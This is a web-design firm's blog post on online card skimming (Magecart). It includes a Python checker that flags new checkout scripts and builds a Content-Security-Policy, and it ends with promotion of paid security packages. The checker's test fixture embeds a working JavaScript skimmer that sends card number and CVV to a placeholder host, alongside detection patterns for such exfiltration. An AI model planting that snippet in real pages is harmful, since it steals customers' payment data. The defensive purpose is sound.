Written by Steve Perry

Alas, I cannot skim: Online skimming and what to do about it

Card fraud has been around for years, and tampered ATM card slots and rigged contactless payment terminals have made the news many times. Many people have therefore learned how to keep their card details safe while out and about: a hand over the keypad in the supermarket, a glance to make sure nobody is standing too close at the cash machine, a check for unusual attachments on the slot. And yet many of those same customers never stop to ask whether an ecommerce store they trust has adequate security to protect them from online skimming.

On 1 August 2019, the Payment Card Industry Security Standards Council (PCI SSC), in conjunction with the Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC), released ‘The Threat of Online Skimming to Payment Security’. Both organisations exist to improve the security of account data and to share threat information with businesses, and they published the bulletin to raise awareness of ecommerce website weaknesses and of the Magecart threat in particular.

But what is ‘online skimming’?

Online skimming, also known as ‘web skimming’, is essentially digital card fraud. A criminal exploits a weakness in a website, such as an out-of-date plugin or a compromised third-party script, to inject malicious JavaScript into the checkout page. That code collects (ie. ‘skims’) the logins and payment details a customer types into the checkout form and sends a copy to a server the attacker controls. The genuine order still goes through, so neither the customer nor the shop sees anything wrong at the time.

This threat isn’t new – it was first reported back in 2015 – but it is now far more prevalent. The PCI SSC and RH-ISAC bulletin notes that some of the latest attacks use ‘JavaScript sniffers’, which are even harder to spot than earlier versions. Research suggests the attackers usually go in through third-party services such as “advertising scripts, live chat functions, and customer rating features”, so the skimmer never has to touch the shop’s own code. Worse, many website owners are unaware of the breach at all, and the bulletin adds that 1 in 5 Magecart-infected websites are reinfected within days.

How can you protect your website and your customers?

Worried that you haven’t got the skills to spot suspect code? To most people it is just a sea of letters, numbers and symbols, and if you can’t swim, the moment you tumble out of a raft into choppy water shouldn’t be your first lesson.

If your website security is neglected, or the danger is not spotted in time, you risk the cost of plugging the exploited holes in your website, on top of the unnecessary distress and loss caused to your customers. You also face the likelihood of a hefty fine for breaching the General Data Protection Regulation (GDPR) if your business operates in the UK or the EU.

Prevention and quick detection are key, but having the time and skills to do this in-house is the main problem for most people. To manage the risk effectively you need to be able to identify coding vulnerabilities, use assessment and monitoring tools, and carry out regular scans and penetration tests. You also need to know exactly which scripts your checkout page is supposed to load, so that a new or altered one stands out; keep software up to date and apply security updates and patches promptly; stay informed of new threats; and know how to clean the website properly if something is found.
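To make the “monitoring” and “know which scripts your checkout loads” points concrete, here is a small script-inventory check. It is an added example, not code from this site or from the PCI SSC bulletin, and every hostname in it is a constructed placeholder. It records the scripts on a known-good copy of the checkout page, compares today’s page against that baseline, flags new third-party origins and changed inline scripts, applies a simple skimmer heuristic (reads card fields and ships data to an untrusted host), and builds a Content-Security-Policy header from the baseline so that an injected script or an off-site beacon is blocked by the browser as well as reported.

```python
"""Checkout script-inventory check (added example; hostnames are constructed placeholders)."""
import base64
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Origins the shop has deliberately chosen to load scripts from (hypothetical).
TRUSTED_ORIGINS = {"https://shop.example", "https://chat.vendor.example"}

# Constructed sample: the checkout page as recorded at the last known-good scan...
BASELINE_HTML = """<html><body>
<form id="checkout" action="/pay" method="post">
  <input id="cardNumber" name="cardNumber"><input id="cvv" name="cvv">
</form>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://chat.vendor.example/widget.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>"""

# ...and the same page after a compromise: a "rating widget" from an unknown host, plus an
# injected inline snippet that copies the card fields to a host the shop has never heard of.
CURRENT_HTML = BASELINE_HTML.replace(
    "</body>",
    """<script src="https://ratings.cdn-widget.invalid/rate.js"></script>
<script>document.getElementById('checkout').addEventListener('submit', function () {
  var d = {n: document.getElementById('cardNumber').value, c: document.getElementById('cvv').value};
  new Image().src = 'https://stats.collector.invalid/i.gif?d=' + btoa(JSON.stringify(d));
});</script>
</body>""")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and the byte-exact bodies of inline scripts."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            # Not stripped: a CSP hash must be computed over the literal script body.
            self.inline.append("".join(self._buf))
            self._buf = None


def origin(url):
    u = urlparse(url)
    return f"{u.scheme}://{u.netloc}"


def inventory(html):
    """Return the page's external script URLs and its inline scripts keyed by SHA-256."""
    p = ScriptCollector()
    p.feed(html)
    return {"external": set(p.external),
            "inline": {hashlib.sha256(s.encode()).hexdigest(): s for s in p.inline}}


CARD_FIELDS = re.compile(r"card|cvv|cvc|expir|\bpan\b", re.I)
EXFIL = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=", re.I)
URLS = re.compile(r"https?://[^\s'\"]+")


def looks_like_skimmer(script, trusted):
    """Heuristic: touches payment fields AND has a way to send data to a host we do not trust."""
    reads_card = bool(CARD_FIELDS.search(script))
    sends = bool(EXFIL.search(script))
    foreign = [u for u in URLS.findall(script) if origin(u) not in trusted]
    return reads_card and sends and bool(foreign)


def check(baseline, current, trusted):
    """Compare today's inventory with the baseline and return human-readable findings."""
    findings = []
    for url in sorted(current["external"] - baseline["external"]):
        status = "trusted origin" if origin(url) in trusted else "UNKNOWN origin"
        findings.append(f"new external script {url} ({status})")
    for url in sorted(baseline["external"] - current["external"]):
        findings.append(f"external script missing: {url}")
    for digest, body in current["inline"].items():
        if digest not in baseline["inline"]:
            findings.append(f"new or changed inline script sha256:{digest[:12]}")
            if looks_like_skimmer(body, trusted):
                findings.append(f"  -> reads payment fields and sends to untrusted host (sha256:{digest[:12]})")
    return findings


def build_csp(baseline, trusted):
    """A Content-Security-Policy that pins the page to its baseline scripts and blocks off-site sends."""
    script_origins = sorted({origin(u) for u in baseline["external"]} | trusted)
    inline_hashes = ["'sha256-" + base64.b64encode(hashlib.sha256(s.encode()).digest()).decode() + "'"
                     for s in baseline["inline"].values()]
    return "; ".join([
        "default-src 'self'",
        "script-src 'self' " + " ".join(script_origins + inline_hashes),
        "connect-src 'self' " + " ".join(script_origins),  # fetch/XHR/beacon only to known hosts
        "img-src 'self'",                                  # an <img> beacon to another host is blocked
        "form-action 'self'",                              # the checkout form cannot be re-pointed off-site
    ])


if __name__ == "__main__":
    base, cur = inventory(BASELINE_HTML), inventory(CURRENT_HTML)
    for line in check(base, cur, TRUSTED_ORIGINS):
        print(line)
    print("Content-Security-Policy:", build_csp(base, TRUSTED_ORIGINS))
```

In practice you would fetch the live checkout page on a schedule, keep the baseline under version control, and alert on any non-empty finding list; the heuristic is deliberately simple and will miss an obfuscated skimmer, which is why the CSP (and regular rebaselining after legitimate changes) matters as much as the diff. A third-party script that is allowed by the policy can still be altered at its source, so pairing `script-src` with Subresource Integrity hashes on the `<script>` tags closes that gap too.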

To help, I’d recommend taking a look at the Zenplan website maintenance package. This will reduce the risk of a breach as it involves regular updates which makes it harder for hackers to worm their way in. With the plan, you can also expect routine security scans and monitoring of the website, ensuring potential concerns are flagged as soon as possible.

I also offer an FGX-Web security package, a specialist security service using Foregenix FGX-Web technology. This is delivered by the Foregenix Threat Intelligence Team and ensures your website is monitored by analysts who are experts at reducing data breach risks. If a PCI Forensic Investigator (PFI) investigation is carried out as a result of a data breach, your business could be charged a case fee (estimated at £3k) plus a set charge per card at risk. The FGX-Web security package comes with up to £50k warranty, depending upon which package is chosen, to give you peace of mind.

Interested in reading more about website security? Why not check out ‘website security, the fundamentals’?

If you require any more information, or would like to enquire about website maintenance packages, feel free to send me an email at ideas@steveperrycreative.com, call on 01782 954282, or follow me on social media for bite-sized updates on Twitter @stevemarkperry.

Steve Perry Creative Ltd

Studio and registered office: 4 Back Lane, Brown Edge, Staffordshire ST6 8QS.

Copyright © 2012 – 2023 Steve Perry Creative Ltd., unless otherwise noted.

Registered in England & Wales, number 08354632.
